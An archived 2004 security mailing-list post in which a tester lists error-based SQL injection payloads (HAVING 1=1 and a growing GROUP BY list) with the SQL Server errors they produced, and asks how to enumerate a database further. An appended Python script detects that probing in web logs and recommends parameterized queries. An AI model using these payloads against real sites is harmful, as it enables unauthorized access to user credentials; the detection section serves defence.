Re: Hacme Bank

From: KrK (krk41@yahoo.com)
Date: Fri Sep 17 2004 - 08:37:53 EDT


Hi List,
I have been doing testing of a web site and have
found all the errors as detailed in the advanced
SQL injection paper by ngsoftware and in Hacme
Bank.

I have been stuck on the way because of a
different error and am unable to enumerate the
database further. Here is the list of tests that
I have done and the corresponding output; if anyone
could suggest how to enumerate the rest of the
table fields it would be great.
 
step 1: userid='%20having%201%3d1%2d%2d
 (encoded form of ' having 1=1--)
result 1:
Column 'logindetls.userid' is invalid in the
select list because it is not contained in an
aggregate function and there is no GROUP BY clause.

step 2: '%20GROUP%20BY%20logindetls.userid%20having%201=1--
result 2:
Column 'logindetls.password' is invalid in the
select list because it is not contained in either
an aggregate function or the GROUP BY clause.

step 3: userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201=1--
result 3:
Column 'logindetls.name' is invalid in the select
list because it is not contained in either an
aggregate function or the GROUP BY clause.
 
And so on and so forth until I reach a point
where I get this error:

[Microsoft][ODBC SQL Server Driver][SQL
Server]:the text, ntext, and image data types
cannot be compared or sorted, except when using IS
NULL or LIKE operator

The application, I feel, stores text data in one of
the fields, which results in the generation of this
error. Has anyone on the list come across this?
Any clues on how to enumerate the database further?
Thanking you,
Krk

" DON'T WORRY BE HAPPY,
  EVERY NIGHT YOU HAVE SOME TROUBLE,
  IF YOU WORRY YOU MAKE IT DOUBLE,
  SO DON'T WORRY BE HAPPY NOW...."
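
Added example, not part of the original post: the HAVING 1=1 / GROUP BY probing sequence described in the message leaves a recognisable trail in web server logs, and the sketch below flags it per client. The log line layout, the /login.asp and /search.asp paths and the pwd parameter are constructed assumptions; only the probe strings and the logindetls column names come from the message.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines: "<client> <method> <target> <status>".
SAMPLE_LOG = [
    "10.0.0.5 GET /login.asp?userid=alice&pwd=x 200",
    "10.0.0.9 GET /login.asp?userid='%20having%201%3d1%2d%2d 500",
    "10.0.0.9 GET /login.asp?userid='%20GROUP%20BY%20logindetls.userid%20having%201=1-- 500",
    "10.0.0.9 GET /login.asp?userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201=1-- 500",
    "10.0.0.7 GET /search.asp?q=having%20fun 200",  # benign use of the word
]

# A quote that closes the string, an optional GROUP BY column list, then
# HAVING 1=1 and a trailing SQL comment, matched on the decoded value.
HAVING_RE = re.compile(
    r"'\s*(?:group\s+by\s+(?P<cols>[\w.,\s\[\]]+?)\s+)?having\s+1\s*=\s*1\s*--",
    re.IGNORECASE,
)

def inspect(line):
    """Return (client, parameter, group_by_column_count) for a probe, else None."""
    client, _method, target, _status = line.split()
    # parse_qsl percent-decodes each value, so %20, %3d and %2d are normalised.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        match = HAVING_RE.search(value)
        if match:
            cols = match.group("cols")
            count = len([c for c in cols.split(",") if c.strip()]) if cols else 0
            return client, name, count
    return None

def summarize(lines):
    """Per client: (number of probes, widest GROUP BY column list seen)."""
    seen = {}
    for line in lines:
        hit = inspect(line)
        if hit:
            client, _name, count = hit
            probes, widest = seen.get(client, (0, 0))
            seen[client] = (probes + 1, max(widest, count))
    return seen

if __name__ == "__main__":
    for client, (probes, widest) in summarize(SAMPLE_LOG).items():
        print(f"{client}: {probes} HAVING/GROUP BY probes, {widest} columns named")
```

A GROUP BY list that grows from one request to the next, each answered with a 500, means the application is returning raw database errors to the client; parameterized queries and generic error pages remove both the injection point and the column-name leak.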

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:05 EDT